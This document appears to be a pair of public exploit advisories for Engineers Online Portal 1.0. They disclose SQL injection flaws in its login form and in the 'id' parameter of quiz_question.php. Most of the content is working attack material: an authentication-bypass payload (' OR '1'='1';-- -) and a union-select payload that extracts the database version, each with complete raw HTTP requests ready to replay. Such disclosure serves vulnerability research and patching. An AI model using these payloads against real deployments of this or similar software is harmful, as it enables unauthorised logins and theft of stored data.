# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: login.php # VUlnerable parameters: "username", "password" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - ' OR '1'='1';-- - --- POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 41 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username='+or+'1'%3D'1'%3B--+-&password=sqli OR POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username=sqli&password='+or+'1'%3D'1'%3B--+- --- ----------------- # Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: quiz_question.php # Vulnerable Parameter: "id" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php 2) Insert your payload in the id parameter Proof of concept (Poc): The following payload will allow you to extract the MySql server version running on the web server - ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- - --- GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 ---